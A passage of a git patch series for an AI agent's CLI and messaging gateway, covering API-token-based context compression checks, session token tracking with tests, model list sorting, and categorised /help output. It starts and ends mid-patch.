— the agent's own compression uses actual API-reported token counts
for precise threshold management.
---
 gateway/run.py | 18 ++++++++++++------
 1 file changed, 12 insertions(+), 6 deletions(-)

diff --git a/gateway/run.py b/gateway/run.py
index d1a639b8..151ffad1 100644
--- a/gateway/run.py
+++ b/gateway/run.py
@@ -950,9 +950,12 @@ class GatewayRunner:
         # repeated truncation/context failures.  Detect this early and
         # compress proactively — before the agent even starts.  (#628)
         #
-        # Thresholds are derived from the SAME compression config the
-        # agent uses (compression.threshold × model context length) so
-        # CLI and messaging platforms behave identically.
+        # IMPORTANT: This pre-check uses a rough char-based estimate
+        # (~4 chars/token) which significantly overestimates for
+        # tool-heavy conversations (code/JSON tokenizes at 5-7+
+        # chars/token).  To avoid premature compression, we apply a
+        # 1.4x safety factor — the agent's own compression uses actual
+        # API-reported token counts and handles precise thresholds.
         # -----------------------------------------------------------------
         if history and len(history) >= 4:
             from agent.model_metadata import (
@@ -1000,11 +1003,14 @@ class GatewayRunner:
 
             if _hyg_compression_enabled:
                 _hyg_context_length = get_model_context_length(_hyg_model)
+                # Apply 1.4x safety factor to account for rough estimate
+                # overestimation on tool-heavy / code-heavy conversations.
+                _ROUGH_ESTIMATE_SAFETY = 1.4
                 _compress_token_threshold = int(
-                    _hyg_context_length * _hyg_threshold_pct
+                    _hyg_context_length * _hyg_threshold_pct * _ROUGH_ESTIMATE_SAFETY
                 )
-                # Warn if still huge after compression (95% of context)
-                _warn_token_threshold = int(_hyg_context_length * 0.95)
+                # Warn if still huge after compression (95% of context, with same safety factor)
+                _warn_token_threshold = int(_hyg_context_length * 0.95 * _ROUGH_ESTIMATE_SAFETY)
 
                 _msg_count = len(history)
                 _approx_tokens = estimate_messages_tokens_rough(history)

From 1518734e591ee3cee59705ac828b754b5a43046e Mon Sep 17 00:00:00 2001
From: teknium1 <teknium1@gmail.com>
Date: Tue, 10 Mar 2026 23:20:46 -0700
Subject: [PATCH 045/105] fix: sort Nous Portal model list (opus first, sonnet
 lower)

fetch_nous_models() returned models in whatever order the API gave
them, which put sonnet near the top. Add a priority sort so users
see the best models first: opus > pro > other > sonnet.
---
 hermes_cli/auth.py | 13 +++++++++++++
 1 file changed, 13 insertions(+)

diff --git a/hermes_cli/auth.py b/hermes_cli/auth.py
index d89eadc7..c90f7792 100644
--- a/hermes_cli/auth.py
+++ b/hermes_cli/auth.py
@@ -1103,6 +1103,19 @@ def fetch_nous_models(
                 continue
             model_ids.append(mid)
 
+    # Sort: prefer opus > pro > haiku/flash > sonnet (sonnet is cheap/fast,
+    # users who want the best model should see opus first).
+    def _model_priority(mid: str) -> tuple:
+        low = mid.lower()
+        if "opus" in low:
+            return (0, mid)
+        if "pro" in low and "sonnet" not in low:
+            return (1, mid)
+        if "sonnet" in low:
+            return (3, mid)
+        return (2, mid)
+
+    model_ids.sort(key=_model_priority)
     return list(dict.fromkeys(model_ids))
 
 

From 58dbd81f0352dd9be6453b70d322749ba247f6eb Mon Sep 17 00:00:00 2001
From: teknium1 <teknium1@gmail.com>
Date: Tue, 10 Mar 2026 23:28:18 -0700
Subject: [PATCH 046/105] fix: use actual API token counts for gateway
 compression pre-check
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Root cause of aggressive gateway compression vs CLI:
- CLI: single AIAgent persists across conversation, uses real API-reported
  prompt_tokens for compression decisions — accurate
- Gateway: each message creates fresh AIAgent, token count discarded after,
  next message pre-check falls back to rough str(msg)//4 estimate which
  overestimates 30-50% on tool-heavy conversations

Fix:
- Add last_prompt_tokens field to SessionEntry — stores the actual
  API-reported prompt token count from the most recent agent turn
- After run_conversation(), extract context_compressor.last_prompt_tokens
  and persist it via update_session()
- Gateway pre-check now uses stored actual tokens when available (exact
  same accuracy as CLI), falling back to rough estimate with 1.4x safety
  factor only for the first message of a session

This makes gateway compression behave identically to CLI compression
for all turns after the first. Reported by TigerHix.
---
 gateway/run.py     | 58 ++++++++++++++++++++++++++++++++--------------
 gateway/session.py | 10 +++++++-
 2 files changed, 50 insertions(+), 18 deletions(-)

diff --git a/gateway/run.py b/gateway/run.py
index 151ffad1..8458bb9d 100644
--- a/gateway/run.py
+++ b/gateway/run.py
@@ -950,12 +950,12 @@ class GatewayRunner:
         # repeated truncation/context failures.  Detect this early and
         # compress proactively — before the agent even starts.  (#628)
         #
-        # IMPORTANT: This pre-check uses a rough char-based estimate
-        # (~4 chars/token) which significantly overestimates for
-        # tool-heavy conversations (code/JSON tokenizes at 5-7+
-        # chars/token).  To avoid premature compression, we apply a
-        # 1.4x safety factor — the agent's own compression uses actual
-        # API-reported token counts and handles precise thresholds.
+        # Token source priority:
+        # 1. Actual API-reported prompt_tokens from the last turn
+        #    (stored in session_entry.last_prompt_tokens)
+        # 2. Rough char-based estimate (str(msg)//4) with a 1.4x
+        #    safety factor to account for overestimation on tool-heavy
+        #    conversations (code/JSON tokenizes at 5-7+ chars/token).
         # -----------------------------------------------------------------
         if history and len(history) >= 4:
             from agent.model_metadata import (
@@ -1003,25 +1003,37 @@ class GatewayRunner:
 
             if _hyg_compression_enabled:
                 _hyg_context_length = get_model_context_length(_hyg_model)
-                # Apply 1.4x safety factor to account for rough estimate
-                # overestimation on tool-heavy / code-heavy conversations.
-                _ROUGH_ESTIMATE_SAFETY = 1.4
                 _compress_token_threshold = int(
-                    _hyg_context_length * _hyg_threshold_pct * _ROUGH_ESTIMATE_SAFETY
+                    _hyg_context_length * _hyg_threshold_pct
                 )
-                # Warn if still huge after compression (95% of context, with same safety factor)
-                _warn_token_threshold = int(_hyg_context_length * 0.95 * _ROUGH_ESTIMATE_SAFETY)
+                _warn_token_threshold = int(_hyg_context_length * 0.95)
 
                 _msg_count = len(history)
-                _approx_tokens = estimate_messages_tokens_rough(history)
+
+                # Prefer actual API-reported tokens from the last turn
+                # (stored in session entry) over the rough char-based estimate.
+                # The rough estimate (str(msg)//4) overestimates by 30-50% on
+                # tool-heavy/code-heavy conversations, causing premature compression.
+                _stored_tokens = session_entry.last_prompt_tokens
+                if _stored_tokens > 0:
+                    _approx_tokens = _stored_tokens
+                    _token_source = "actual"
+                else:
+                    _approx_tokens = estimate_messages_tokens_rough(history)
+                    # Apply safety factor only for rough estimates
+                    _compress_token_threshold = int(
+                        _compress_token_threshold * 1.4
+                    )
+                    _warn_token_threshold = int(_warn_token_threshold * 1.4)
+                    _token_source = "estimated"
 
                 _needs_compress = _approx_tokens >= _compress_token_threshold
 
                 if _needs_compress:
                     logger.info(
-                        "Session hygiene: %s messages, ~%s tokens — auto-compressing "
+                        "Session hygiene: %s messages, ~%s tokens (%s) — auto-compressing "
                         "(threshold: %s%% of %s = %s tokens)",
-                        _msg_count, f"{_approx_tokens:,}",
+                        _msg_count, f"{_approx_tokens:,}", _token_source,
                         int(_hyg_threshold_pct * 100),
                         f"{_hyg_context_length:,}",
                         f"{_compress_token_threshold:,}",
@@ -1344,8 +1356,11 @@ class GatewayRunner:
                         skip_db=agent_persisted,
                     )
             
-            # Update session
-            self.session_store.update_session(session_entry.session_key)
+            # Update session with actual prompt token count from the agent
+            self.session_store.update_session(
+                session_entry.session_key,
+                last_prompt_tokens=agent_result.get("last_prompt_tokens", 0),
+            )
             
             return response
             
@@ -2908,6 +2923,13 @@ class GatewayRunner:
             
             # Return final response, or a message if something went wrong
             final_response = result.get("final_response")
+
+            # Extract last actual prompt token count from the agent's compressor
+            _last_prompt_toks = 0
+            _agent = agent_holder[0]
+            if _agent and hasattr(_agent, "context_compressor"):
+                _last_prompt_toks = getattr(_agent.context_compressor, "last_prompt_tokens", 0)
+
             if not final_response:
                 error_msg = f"⚠️ {result['error']}" if result.get("error") else "(No response generated)"
                 return {
@@ -2916,6 +2938,7 @@ class GatewayRunner:
                     "api_calls": result.get("api_calls", 0),
                     "tools": tools_holder[0] or [],
                     "history_offset": len(agent_history),
+                    "last_prompt_tokens": _last_prompt_toks,
                 }
             
             # Scan tool results for MEDIA:<path> tags that need to be delivered
@@ -2959,6 +2982,7 @@ class GatewayRunner:
                 "api_calls": result_holder[0].get("api_calls", 0) if result_holder[0] else 0,
                 "tools": tools_holder[0] or [],
                 "history_offset": len(agent_history),
+                "last_prompt_tokens": _last_prompt_toks,
             }
         
         # Start progress message sender if enabled
diff --git a/gateway/session.py b/gateway/session.py
index 410d2403..e2777fe1 100644
--- a/gateway/session.py
+++ b/gateway/session.py
@@ -241,6 +241,9 @@ class SessionEntry:
     output_tokens: int = 0
     total_tokens: int = 0
     
+    # Last API-reported prompt tokens (for accurate compression pre-check)
+    last_prompt_tokens: int = 0
+    
     # Set when a session was created because the previous one expired;
     # consumed once by the message handler to inject a notice into context
     was_auto_reset: bool = False
@@ -257,6 +260,7 @@ class SessionEntry:
             "input_tokens": self.input_tokens,
             "output_tokens": self.output_tokens,
             "total_tokens": self.total_tokens,
+            "last_prompt_tokens": self.last_prompt_tokens,
         }
         if self.origin:
             result["origin"] = self.origin.to_dict()
@@ -287,6 +291,7 @@ class SessionEntry:
             input_tokens=data.get("input_tokens", 0),
             output_tokens=data.get("output_tokens", 0),
             total_tokens=data.get("total_tokens", 0),
+            last_prompt_tokens=data.get("last_prompt_tokens", 0),
         )
 
 
@@ -550,7 +555,8 @@ class SessionStore:
         self, 
         session_key: str,
         input_tokens: int = 0,
-        output_tokens: int = 0
+        output_tokens: int = 0,
+        last_prompt_tokens: int = 0,
     ) -> None:
         """Update a session's metadata after an interaction."""
         self._ensure_loaded()
@@ -560,6 +566,8 @@ class SessionStore:
             entry.updated_at = datetime.now()
             entry.input_tokens += input_tokens
             entry.output_tokens += output_tokens
+            if last_prompt_tokens > 0:
+                entry.last_prompt_tokens = last_prompt_tokens
             entry.total_tokens = entry.input_tokens + entry.output_tokens
             self._save()
             

From 5eb62ef4238fed579f9ab850818a7db17ce45634 Mon Sep 17 00:00:00 2001
From: teyrebaz33 <teyrebaz33@users.noreply.github.com>
Date: Tue, 10 Mar 2026 23:34:52 -0700
Subject: [PATCH 047/105] test(gateway): add regression test for /retry
 response fix

Adds two tests for _handle_retry_command: verifies /retry returns the
agent response (not None), and verifies graceful handling when no
previous message exists.

Cherry-picked from PR #731 by teyrebaz33. Regression coverage for
the fix merged in PR #441.

Co-authored-by: teyrebaz33 <teyrebaz33@users.noreply.github.com>
---
 tests/gateway/test_retry_response.py | 60 ++++++++++++++++++++++++++++
 1 file changed, 60 insertions(+)
 create mode 100644 tests/gateway/test_retry_response.py

diff --git a/tests/gateway/test_retry_response.py b/tests/gateway/test_retry_response.py
new file mode 100644
index 00000000..34a98015
--- /dev/null
+++ b/tests/gateway/test_retry_response.py
@@ -0,0 +1,60 @@
+"""Regression test: /retry must return the agent response, not None.
+
+Before the fix in PR #441, _handle_retry_command() called
+_handle_message(retry_event) but discarded its return value with `return None`,
+so users never received the final response.
+"""
+import pytest
+from unittest.mock import AsyncMock, MagicMock
+from gateway.run import GatewayRunner
+from gateway.platforms.base import MessageEvent, MessageType
+
+
+@pytest.fixture
+def gateway(tmp_path):
+    config = MagicMock()
+    config.sessions_dir = tmp_path
+    config.max_context_messages = 20
+    gw = GatewayRunner.__new__(GatewayRunner)
+    gw.config = config
+    gw.session_store = MagicMock()
+    return gw
+
+
+@pytest.mark.asyncio
+async def test_retry_returns_response_not_none(gateway):
+    """_handle_retry_command must return the inner handler response, not None."""
+    gateway.session_store.get_or_create_session.return_value = MagicMock(
+        session_id="test-session"
+    )
+    gateway.session_store.load_transcript.return_value = [
+        {"role": "user", "content": "Hello Hermes"},
+        {"role": "assistant", "content": "Hi there!"},
+    ]
+    gateway.session_store.rewrite_transcript = MagicMock()
+    expected_response = "Hi there! (retried)"
+    gateway._handle_message = AsyncMock(return_value=expected_response)
+    event = MessageEvent(
+        text="/retry",
+        message_type=MessageType.TEXT,
+        source=MagicMock(),
+    )
+    result = await gateway._handle_retry_command(event)
+    assert result is not None, "/retry must not return None"
+    assert result == expected_response
+
+
+@pytest.mark.asyncio
+async def test_retry_no_previous_message(gateway):
+    """If there is no previous user message, return early with a message."""
+    gateway.session_store.get_or_create_session.return_value = MagicMock(
+        session_id="test-session"
+    )
+    gateway.session_store.load_transcript.return_value = []
+    event = MessageEvent(
+        text="/retry",
+        message_type=MessageType.TEXT,
+        source=MagicMock(),
+    )
+    result = await gateway._handle_retry_command(event)
+    assert result == "No previous message to retry."

From 909e048ad42c8f237c7d3e30de2627e9bef43cf3 Mon Sep 17 00:00:00 2001
From: teknium1 <teknium1@gmail.com>
Date: Tue, 10 Mar 2026 23:40:24 -0700
Subject: [PATCH 048/105] fix: integration hardening for gateway token tracking
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Follow-up to 58dbd81 — ensures smooth transition for existing users:

- Backward compat: old session files without last_prompt_tokens
  default to 0 via data.get('last_prompt_tokens', 0)
- /compress, /undo, /retry: reset last_prompt_tokens to 0 after
  rewriting transcripts (stale token counts would under-report)
- Auto-compression hygiene: reset last_prompt_tokens after rewriting
- update_session: use None sentinel (not 0) as default so callers
  can explicitly reset to 0 while normal calls don't clobber
- 6 new tests covering: default value, serialization roundtrip,
  old-format migration, set/reset/no-change semantics
- /reset: new SessionEntry naturally gets last_prompt_tokens=0

2942 tests pass.
---
 gateway/run.py                |  10 +++
 gateway/session.py            |   4 +-
 tests/gateway/test_session.py | 116 ++++++++++++++++++++++++++++++++++
 3 files changed, 128 insertions(+), 2 deletions(-)

diff --git a/gateway/run.py b/gateway/run.py
index 8458bb9d..72ec62b4 100644
--- a/gateway/run.py
+++ b/gateway/run.py
@@ -1083,6 +1083,8 @@ class GatewayRunner:
                                 self.session_store.rewrite_transcript(
                                     session_entry.session_id, _compressed
                                 )
+                                # Reset stored token count — transcript was rewritten
+                                session_entry.last_prompt_tokens = 0
                                 history = _compressed
                                 _new_count = len(_compressed)
                                 _new_tokens = estimate_messages_tokens_rough(
@@ -1747,6 +1749,8 @@ class GatewayRunner:
         # Truncate history to before the last user message and persist
         truncated = history[:last_user_idx]
         self.session_store.rewrite_transcript(session_entry.session_id, truncated)
+        # Reset stored token count — transcript was truncated
+        session_entry.last_prompt_tokens = 0
         
         # Re-send by creating a fake text event with the old message
         retry_event = MessageEvent(
@@ -1778,6 +1782,8 @@ class GatewayRunner:
         removed_msg = history[last_user_idx].get("content", "")
         removed_count = len(history) - last_user_idx
         self.session_store.rewrite_transcript(session_entry.session_id, history[:last_user_idx])
+        # Reset stored token count — transcript was truncated
+        session_entry.last_prompt_tokens = 0
         
         preview = removed_msg[:40] + "..." if len(removed_msg) > 40 else removed_msg
         return f"↩️ Undid {removed_count} message(s).\nRemoved: \"{preview}\""
@@ -1911,6 +1917,10 @@ class GatewayRunner:
             )
 
             self.session_store.rewrite_transcript(session_entry.session_id, compressed)
+            # Reset stored token count — transcript changed, old value is stale
+            self.session_store.update_session(
+                session_entry.session_key, last_prompt_tokens=0,
+            )
             new_count = len(compressed)
             new_tokens = estimate_messages_tokens_rough(compressed)
 
diff --git a/gateway/session.py b/gateway/session.py
index e2777fe1..b1cdefa5 100644
--- a/gateway/session.py
+++ b/gateway/session.py
@@ -556,7 +556,7 @@ class SessionStore:
         session_key: str,
         input_tokens: int = 0,
         output_tokens: int = 0,
-        last_prompt_tokens: int = 0,
+        last_prompt_tokens: int = None,
     ) -> None:
         """Update a session's metadata after an interaction."""
         self._ensure_loaded()
@@ -566,7 +566,7 @@ class SessionStore:
             entry.updated_at = datetime.now()
             entry.input_tokens += input_tokens
             entry.output_tokens += output_tokens
-            if last_prompt_tokens > 0:
+            if last_prompt_tokens is not None:
                 entry.last_prompt_tokens = last_prompt_tokens
             entry.total_tokens = entry.input_tokens + entry.output_tokens
             self._save()
diff --git a/tests/gateway/test_session.py b/tests/gateway/test_session.py
index 562c5809..7a7f4b87 100644
--- a/tests/gateway/test_session.py
+++ b/tests/gateway/test_session.py
@@ -429,3 +429,119 @@ class TestHasAnySessions:
 
         store._entries = {"key1": MagicMock()}
         assert store.has_any_sessions() is False
+
+
+class TestLastPromptTokens:
+    """Tests for the last_prompt_tokens field — actual API token tracking."""
+
+    def test_session_entry_default(self):
+        """New sessions should have last_prompt_tokens=0."""
+        from gateway.session import SessionEntry
+        from datetime import datetime
+        entry = SessionEntry(
+            session_key="test",
+            session_id="s1",
+            created_at=datetime.now(),
+            updated_at=datetime.now(),
+        )
+        assert entry.last_prompt_tokens == 0
+
+    def test_session_entry_roundtrip(self):
+        """last_prompt_tokens should survive serialization/deserialization."""
+        from gateway.session import SessionEntry
+        from datetime import datetime
+        entry = SessionEntry(
+            session_key="test",
+            session_id="s1",
+            created_at=datetime.now(),
+            updated_at=datetime.now(),
+            last_prompt_tokens=42000,
+        )
+        d = entry.to_dict()
+        assert d["last_prompt_tokens"] == 42000
+        restored = SessionEntry.from_dict(d)
+        assert restored.last_prompt_tokens == 42000
+
+    def test_session_entry_from_old_data(self):
+        """Old session data without last_prompt_tokens should default to 0."""
+        from gateway.session import SessionEntry
+        data = {
+            "session_key": "test",
+            "session_id": "s1",
+            "created_at": "2025-01-01T00:00:00",
+            "updated_at": "2025-01-01T00:00:00",
+            "input_tokens": 100,
+            "output_tokens": 50,
+            "total_tokens": 150,
+            # No last_prompt_tokens — old format
+        }
+        entry = SessionEntry.from_dict(data)
+        assert entry.last_prompt_tokens == 0
+
+    def test_update_session_sets_last_prompt_tokens(self, tmp_path):
+        """update_session should store the actual prompt token count."""
+        config = GatewayConfig()
+        with patch("gateway.session.SessionStore._ensure_loaded"):
+            store = SessionStore(sessions_dir=tmp_path, config=config)
+        store._loaded = True
+        store._db = None
+        store._save = MagicMock()
+
+        from gateway.session import SessionEntry
+        from datetime import datetime
+        entry = SessionEntry(
+            session_key="k1",
+            session_id="s1",
+            created_at=datetime.now(),
+            updated_at=datetime.now(),
+        )
+        store._entries = {"k1": entry}
+
+        store.update_session("k1", last_prompt_tokens=85000)
+        assert entry.last_prompt_tokens == 85000
+
+    def test_update_session_none_does_not_change(self, tmp_path):
+        """update_session with default (None) should not change last_prompt_tokens."""
+        config = GatewayConfig()
+        with patch("gateway.session.SessionStore._ensure_loaded"):
+            store = SessionStore(sessions_dir=tmp_path, config=config)
+        store._loaded = True
+        store._db = None
+        store._save = MagicMock()
+
+        from gateway.session import SessionEntry
+        from datetime import datetime
+        entry = SessionEntry(
+            session_key="k1",
+            session_id="s1",
+            created_at=datetime.now(),
+            updated_at=datetime.now(),
+            last_prompt_tokens=50000,
+        )
+        store._entries = {"k1": entry}
+
+        store.update_session("k1")  # No last_prompt_tokens arg
+        assert entry.last_prompt_tokens == 50000  # unchanged
+
+    def test_update_session_zero_resets(self, tmp_path):
+        """update_session with last_prompt_tokens=0 should reset the field."""
+        config = GatewayConfig()
+        with patch("gateway.session.SessionStore._ensure_loaded"):
+            store = SessionStore(sessions_dir=tmp_path, config=config)
+        store._loaded = True
+        store._db = None
+        store._save = MagicMock()
+
+        from gateway.session import SessionEntry
+        from datetime import datetime
+        entry = SessionEntry(
+            session_key="k1",
+            session_id="s1",
+            created_at=datetime.now(),
+            updated_at=datetime.now(),
+            last_prompt_tokens=85000,
+        )
+        store._entries = {"k1": entry}
+
+        store.update_session("k1", last_prompt_tokens=0)
+        assert entry.last_prompt_tokens == 0

From 8eb9eed074a0cb32c4974898265979b2d13ece96 Mon Sep 17 00:00:00 2001
From: Bartok Moltbot <bartokmoltbot@Alices-MacBook-Pro-4.local>
Date: Mon, 9 Mar 2026 03:59:47 -0400
Subject: [PATCH 049/105] feat(ux): improve /help formatting with command
 categories (#640)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

- Organize COMMANDS into COMMANDS_BY_CATEGORY dict
- Group commands: Session, Configuration, Tools & Skills, Info, Exit
- Add visual category headers with spacing
- Maintain backwards compat via flat COMMANDS dict
- Better visual hierarchy and scannability

Before:
  /help           - Show this help message
  /tools          - List available tools
  ... (dense list)

After:
  ── Session ──
    /new           Start a new conversation
    /reset         Reset conversation only
    ...

  ── Configuration ──
    /config        Show current configuration
    ...

Closes #640
---
 cli.py                 | 22 +++++++++------
 hermes_cli/commands.py | 64 +++++++++++++++++++++++-------------------
 2 files changed, 48 insertions(+), 38 deletions(-)

diff --git a/cli.py b/cli.py
index a2a3f8c1..0d13d230 100755
--- a/cli.py
+++ b/cli.py
@@ -1942,18 +1942,22 @@ class HermesCLI:
         )
     
     def show_help(self):
-        """Display help information."""
-        _cprint(f"\n{_BOLD}+{'-' * 50}+{_RST}")
-        _cprint(f"{_BOLD}|{' ' * 14}(^_^)? Available Commands{' ' * 10}|{_RST}")
-        _cprint(f"{_BOLD}+{'-' * 50}+{_RST}\n")
-        
-        for cmd, desc in COMMANDS.items():
-            _cprint(f"  {_GOLD}{cmd:<15}{_RST} {_DIM}-{_RST} {desc}")
-        
+        """Display help information with categorized commands."""
+        from hermes_cli.commands import COMMANDS_BY_CATEGORY
+
+        _cprint(f"\n{_BOLD}+{'-' * 55}+{_RST}")
+        _cprint(f"{_BOLD}|{' ' * 14}(^_^)? Available Commands{' ' * 15}|{_RST}")
+        _cprint(f"{_BOLD}+{'-' * 55}+{_RST}")
+
+        for category, commands in COMMANDS_BY_CATEGORY.items():
+            _cprint(f"\n  {_BOLD}── {category} ──{_RST}")
+            for cmd, desc in commands.items():
+                _cprint(f"    {_GOLD}{cmd:<15}{_RST} {_DIM}-{_RST} {desc}")
+
         if _skill_commands:
             _cprint(f"\n  ⚡ {_BOLD}Skill Commands{_RST} ({len(_skill_commands)} installed):")
             for cmd, info in sorted(_skill_commands.items()):
-                _cprint(f"  {_GOLD}{cmd:<22}{_RST} {_DIM}-{_RST} {info['description']}")
+                _cprint(f"    {_GOLD}{cmd:<22}{_RST} {_DIM}-{_RST} {info['description']}")
 
         _cprint(f"\n  {_DIM}Tip: Just type your message to chat with Hermes!{_RST}")
         _cprint(f"  {_DIM}Multi-line: Alt+Enter for a new line{_RST}")
diff --git a/hermes_cli/commands.py b/hermes_cli/commands.py
index 72c9e77c..e1b23d87 100644
--- a/hermes_cli/commands.py
+++ b/hermes_cli/commands.py
@@ -13,37 +13,43 @@ from typing import Any
 from prompt_toolkit.completion import Completer, Completion
 
 
-COMMANDS = {
-    "/help": "Show this help message",
-    "/tools": "List available tools",
-    "/toolsets": "List available toolsets",
-    "/model": "Show or change the current model",
-    "/provider": "Show available providers and current provider",
-    "/prompt": "View/set custom system prompt",
-    "/personality": "Set a predefined personality",
-    "/clear": "Clear screen and reset conversation (fresh start)",
-    "/history": "Show conversation history",
-    "/new": "Start a new conversation (reset history)",
-    "/reset": "Reset conversation only (keep screen)",
-    "/retry": "Retry the last message (resend to agent)",
-    "/undo": "Remove the last user/assistant exchange",
-    "/save": "Save the current conversation",
-    "/config": "Show current configuration",
-    "/cron": "Manage scheduled tasks (list, add, remove)",
-    "/skills": "Search, install, inspect, or manage skills from online registries",
-    "/platforms": "Show gateway/messaging platform status",
-    "/verbose": "Cycle tool progress display: off → new → all → verbose",
-    "/compress": "Manually compress conversation context (flush memories + summarize)",
-    "/title": "Set a title for the current session (usage: /title My Session Name)",
-    "/usage": "Show token usage for the current session",
-    "/insights": "Show usage insights and analytics (last 30 days)",
-    "/paste": "Check clipboard for an image and attach it",
-    "/reload-mcp": "Reload MCP servers from config.yaml",
-    "/rollback": "List or restore filesystem checkpoints (usage: /rollback [number])",
-    "/skin": "Show or change the display skin/theme",
-    "/quit": "Exit the CLI (also: /exit, /q)",
+# Commands organized by category for better help display
+COMMANDS_BY_CATEGORY = {
+    "Session": {
+        "/new": "Start a new conversation (reset history)",
+        "/reset": "Reset conversation only (keep screen)",
+        "/clear": "Clear screen and reset conversation (fresh start)",
+        "/history": "Show conversation history",
+        "/save": "Save the current conversation",
+        "/retry": "Retry the last message (resend to agent)",
+        "/undo": "Remove the last user/assistant exchange",
+    },
+    "Configuration": {
+        "/config": "Show current configuration",
+        "/model": "Show or change the current model",
+        "/prompt": "View/set custom system prompt",
+        "/personality": "Set a predefined personality",
+    },
+    "Tools & Skills": {
+        "/tools": "List available tools",
+        "/toolsets": "List available toolsets",
+        "/skills": "Search, install, inspect, or manage skills",
+        "/cron": "Manage scheduled tasks (list, add, remove)",
+    },
+    "Info": {
+        "/help": "Show this help message",
+        "/platforms": "Show gateway/messaging platform status",
+    },
+    "Exit": {
+        "/quit": "Exit the CLI (also: /exit, /q)",
+    },
 }
 
+# Flat dict for backwards compatibility and autocomplete
+COMMANDS = {}
+for category_commands in COMMANDS_BY_CATEGORY.values():
+    COMMANDS.update(category_commands)
+
 
 class SlashCommandCompleter(Completer):
     """Autocomplete for built-in slash commands and optional skill commands."""

From 2b244762e14a04b39efdb74433ff36a939c9d1ca Mon Sep 17 00:00:00 2001
From: teknium1 <teknium1@gmail.com>
Date: Tue, 10 Mar 2026 23:49:03 -0700
Subject: [PATCH 050/105] feat: add missing commands to categorized /help
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Post-merge follow-up to PR #752 — adds 10 commands that were added
since the PR was submitted:

Session: /title, /compress, /rollback
Configuration: /provider, /verbose, /skin
Tools & Skills: /reload-mcp (+ full /skills description)
Info: /usage, /insights, /paste

Also preserved existing color formatting (_cprint, _GOLD, _BOLD, _DIM)
and skill commands section from main.
---
 hermes_cli/commands.py      | 12 ++++++++-
 hermes_cli/skills_config.py | 19 +++++++-------
 hermes_cli/tools_config.py  | 52 ++++++++++++++++++++++++++++++++++---
 3 files changed, 69 insertions(+), 14 deletions(-)

diff --git a/hermes_cli/commands.py b/hermes_cli/commands.py
index e1b23d87..0d9a796b 100644
--- a/hermes_cli/commands.py
+++ b/hermes_cli/commands.py
@@ -23,22 +23,32 @@ COMMANDS_BY_CATEGORY = {
         "/save": "Save the current conversation",
         "/retry": "Retry the last message (resend to agent)",
         "/undo": "Remove the last user/assistant exchange",
+        "/title": "Set a title for the current session (usage: /title My Session Name)",
+        "/compress": "Manually compress conversation context (flush memories + summarize)",
+        "/rollback": "List or restore filesystem checkpoints (usage: /rollback [number])",
     },
     "Configuration": {
         "/config": "Show current configuration",
         "/model": "Show or change the current model",
+        "/provider": "Show available providers and current provider",
         "/prompt": "View/set custom system prompt",
         "/personality": "Set a predefined personality",
+        "/verbose": "Cycle tool progress display: off → new → all → verbose",
+        "/skin": "Show or change the display skin/theme",
     },
     "Tools & Skills": {
         "/tools": "List available tools",
         "/toolsets": "List available toolsets",
-        "/skills": "Search, install, inspect, or manage skills",
+        "/skills": "Search, install, inspect, or manage skills from online registries",
         "/cron": "Manage scheduled tasks (list, add, remove)",
+        "/reload-mcp": "Reload MCP servers from config.yaml",
     },
     "Info": {
         "/help": "Show this help message",
+        "/usage": "Show token usage for the current session",
+        "/insights": "Show usage insights and analytics (last 30 days)",
         "/platforms": "Show gateway/messaging platform status",
+        "/paste": "Check clipboard for an image and attach it",
     },
     "Exit": {
         "/quit": "Exit the CLI (also: /exit, /q)",
diff --git a/hermes_cli/skills_config.py b/hermes_cli/skills_config.py
index 0e97f8e4..256f7ba5 100644
--- a/hermes_cli/skills_config.py
+++ b/hermes_cli/skills_config.py
@@ -111,7 +111,7 @@ def _prompt_checklist(title: str, items: List[str], disabled_items: Set[str]) ->
                 curses.use_default_colors()
                 curses.init_pair(1, curses.COLOR_GREEN, -1)
                 curses.init_pair(2, curses.COLOR_YELLOW, -1)
-                curses.init_pair(3, curses.COLOR_RED, -1)
+                curses.init_pair(3, 8, -1)  # dim gray
             cursor = 0
             scroll_offset = 0
             while True:
@@ -121,28 +121,27 @@ def _prompt_checklist(title: str, items: List[str], disabled_items: Set[str]) ->
                     hattr = curses.A_BOLD | (curses.color_pair(2) if curses.has_colors() else 0)
                     stdscr.addnstr(0, 0, title, max_x - 1, hattr)
                     stdscr.addnstr(1, 0, "  ↑↓ navigate  SPACE toggle  ENTER confirm  ESC cancel", max_x - 1,
-                                   curses.color_pair(3) if curses.has_colors() else curses.A_DIM)
-                    stdscr.addnstr(2, 0, "  [✓] enabled   [✗] disabled", max_x - 1, curses.A_DIM)
+                                   curses.A_DIM)
                 except curses.error:
                     pass
-                visible_rows = max_y - 4
+                visible_rows = max_y - 3
                 if cursor < scroll_offset:
                     scroll_offset = cursor
                 elif cursor >= scroll_offset + visible_rows:
                     scroll_offset = cursor - visible_rows + 1
                 for draw_i, i in enumerate(range(scroll_offset, min(len(items), scroll_offset + visible_rows))):
-                    y = draw_i + 4
+                    y = draw_i + 3
                     if y >= max_y - 1:
                         break
                     is_disabled = i in selected
-                    check = "✗" if is_disabled else "✓"
+                    check = " " if is_disabled else "✓"
                     arrow = "→" if i == cursor else " "
                     line = f" {arrow} [{check}] {items[i]}"
                     attr = curses.A_NORMAL
                     if i == cursor:
-                        attr = curses.A_BOLD | (curses.color_pair(1) if curses.has_colors() else 0)
-                    elif is_disabled and curses.has_colors():
-                        attr = curses.color_pair(3)
+                        attr = curses.A_BOLD
+                        if curses.has_colors():
+                            attr |= curses.color_pair(1)
                     try:
                         stdscr.addnstr(y, 0, line, max_x - 1, attr)
                     except curses.error:
@@ -179,7 +178,7 @@ def _numbered_toggle(title: str, items: List[str], disabled: Set[str]) -> Set[st
         print()
         print(color(f"{title}", Colors.BOLD))
         for i, item in enumerate(items, 1):
-            mark = "✗" if item in current else "✓"
+            mark = "✓" if item not in current else " "
             print(f"  {i:3}. [{mark}] {item}")
         print()
         print(color("  Number to toggle, 's' save, 'q' cancel:", Colors.DIM))
diff --git a/hermes_cli/tools_config.py b/hermes_cli/tools_config.py
index 19288bf5..f334f9a1 100644
--- a/hermes_cli/tools_config.py
+++ b/hermes_cli/tools_config.py
